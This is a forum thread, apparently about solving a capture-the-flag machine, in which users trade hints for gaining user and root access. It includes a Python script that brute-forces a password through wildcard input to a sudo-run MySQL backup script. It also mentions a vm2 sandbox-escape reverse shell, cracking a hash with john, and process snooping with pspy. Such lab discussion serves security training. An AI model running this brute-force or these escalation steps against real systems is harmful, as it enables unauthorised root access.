Posts: 8
Threads: 0
Joined: Jul 2023
import string
import subprocess
all_characters_and_numbers = list(string.ascii_letters + string.digits)
password = ""
found = False
while not found:
for character in all_characters_and_numbers:
command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
if "Password confirmed!" in output:
password += character
print(password)
break
else:
found = True
Posts: 1
Threads: 0
Joined: Nov 2023
Is the hash in /var/www/contact/ useful?
Posts: 1
Threads: 0
Joined: Nov 2023
Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work  )
Posts: 2
Threads: 0
Joined: Oct 2023
(Nov 05, 2023, 07:07 AM)McJhonkler Wrote: Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work )
i got mysql password but how i use it for root?
Posts: 2
Threads: 0
Joined: Oct 2023
(Nov 05, 2023, 07:17 AM)xts Wrote: (Nov 05, 2023, 07:07 AM)McJhonkler Wrote: Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work )
i got mysql password but how i use it for root?
su -
and paste your passwd
Posts: 12
Threads: 0
Joined: Nov 2023
(Nov 05, 2023, 07:17 AM)xts Wrote: (Nov 05, 2023, 07:07 AM)McJhonkler Wrote: Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work )
i got mysql password but how i use it for root?
Where did you find the pass?
Posts: 3
Threads: 1
Joined: Nov 2023
(Nov 05, 2023, 04:10 PM)intersteller2038 Wrote: (Nov 05, 2023, 07:17 AM)xts Wrote: (Nov 05, 2023, 07:07 AM)McJhonkler Wrote: Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work )
i got mysql password but how i use it for root?
Where did you find the pass?
You can bruteforce the password, just use the script that user rwwwshell posted above
Posts: 12
Threads: 0
Joined: Nov 2023
(Nov 05, 2023, 04:20 PM)0BL1V10N Wrote: (Nov 05, 2023, 04:10 PM)intersteller2038 Wrote: (Nov 05, 2023, 07:17 AM)xts Wrote: (Nov 05, 2023, 07:07 AM)McJhonkler Wrote: Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work )
i got mysql password but how i use it for root?
Where did you find the pass?
You can bruteforce the password, just use the script that user rwwwshell posted above
Got it, but is there any other way of solving the machine?
Posts: 54
Threads: 1
Joined: Aug 2023
(Nov 04, 2023, 07:13 PM)chillywilly Wrote: lets goooooo 
hopefully the box starts working off to a rough start
its a node.js box
dont really enjoy stuff but here goes nothing
Posts: 3
Threads: 1
Joined: Nov 2023
(Nov 05, 2023, 04:56 PM)intersteller2038 Wrote: (Nov 05, 2023, 04:20 PM)0BL1V10N Wrote: (Nov 05, 2023, 04:10 PM)intersteller2038 Wrote: (Nov 05, 2023, 07:17 AM)xts Wrote: (Nov 05, 2023, 07:07 AM)McJhonkler Wrote: Hint: vm2 poc (reverse shell in js)
USER:
.db + john
ROOT:
pspy + .sh (some digit will work )
i got mysql password but how i use it for root?
Where did you find the pass?
You can bruteforce the password, just use the script that user rwwwshell posted above
Got it, but is there any other way of solving the machine?
Yes, you can run the sudo command and then pspy and you will find something interesting
|
